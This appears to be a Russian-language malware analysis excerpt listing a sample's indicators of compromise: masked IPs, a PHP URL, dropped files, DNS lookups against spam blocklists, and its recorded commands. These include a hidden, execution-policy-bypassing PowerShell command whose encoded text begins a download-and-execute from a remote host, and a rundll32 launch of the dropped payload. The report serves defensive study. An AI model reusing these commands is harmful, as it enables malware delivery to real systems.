Техническая информация
- http://46.#.19.179/bangladesh.php
- <SYSTEM32>\wermgr.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\olxya.bin
- '46.#.19.179':80
- '10#.#75.94.164':80
- '18#.#4.99.214':443
- 'id##t.me':443
- '18#.#4.99.214':443
- 'id##t.me':443
- DNS ASK id##t.me
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK 19#.###.###.95.b.barracudacentral.org
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...
- '<SYSTEM32>\rundll32.exe' %TEMP%\OlxYA.bin StartW
- '<SYSTEM32>\wermgr.exe'